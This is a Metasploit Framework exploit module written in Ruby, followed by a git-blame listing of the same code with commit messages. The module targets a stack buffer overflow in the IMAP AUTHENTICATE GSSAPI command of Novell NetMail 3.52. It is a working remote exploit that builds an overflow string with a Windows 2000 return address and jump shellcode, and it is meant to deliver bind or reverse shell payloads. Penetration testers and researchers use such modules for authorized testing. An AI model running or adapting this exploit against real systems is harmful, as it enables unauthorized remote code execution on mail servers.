metasploit-framework/modules/exploits/windows/imap/novell_netmail_auth.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE
        GSSAPI command. By sending an overly long string, an attacker can overwrite the
        buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp
        or windows/shell_reverse_tcp allows for the most reliable results.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '55175' ],
          [ 'URL', 'http://www.w00t-shell.net/' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 850,
          'BadChars' => "\x00\x20\x2c\x3a\x40",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
        ],
      'DisclosureDate' => 'Jan 7 2007',
      'DefaultTarget'  => 0))

    register_options( [ Opt::RPORT(143) ], self.class )
  end

  def exploit
    connect
    sock.get_once

    jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
    jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
    jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

    sploit  =  "A001 AUTHENTICATE GSSAPI\r\n"
    sploit  << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"
    sploit  << rand_text_alpha_upper(2) + [target.ret].pack('V')
    sploit  << make_nops(8) + jmp + rand_text_alpha_upper(700)

    print_status("Trying target #{target.name}...")
    sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")

    handler
    disconnect
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Tcp`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
Add last chunk of fixes 2014-03-11 17:44:34 +00:00			`'Name' => 'Novell NetMail IMAP AUTHENTICATE Buffer Overflow',`
Retab modules 2013-08-30 21:28:54 +00:00			`'Description' => %q{`
			`This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE`
			`GSSAPI command. By sending an overly long string, an attacker can overwrite the`
			`buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp`
			`or windows/shell_reverse_tcp allows for the most reliable results.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'OSVDB', '55175' ],`
			`[ 'URL', 'http://www.w00t-shell.net/' ],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 850,`
			`'BadChars' => "\x00\x20\x2c\x3a\x40",`
			`'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",`
			`'EncoderType' => Msf::Encoder::Type::AlphanumUpper,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],`
			`],`
			`'DisclosureDate' => 'Jan 7 2007',`
			`'DefaultTarget' => 0))`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options( [ Opt::RPORT(143) ], self.class )`
			`end`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
			`sock.get_once`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"`
			`jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"`
			`jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`sploit = "A001 AUTHENTICATE GSSAPI\r\n"`
			`sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06"`
			`sploit << rand_text_alpha_upper(2) + [target.ret].pack('V')`
			`sploit << make_nops(8) + jmp + rand_text_alpha_upper(700)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target #{target.name}...")`
			`sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n")`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
added exploit module novell_netmail_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@4312 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-03 13:11:01 +00:00
OSVDB references updates from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6812 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-16 16:02:24 +00:00			`end`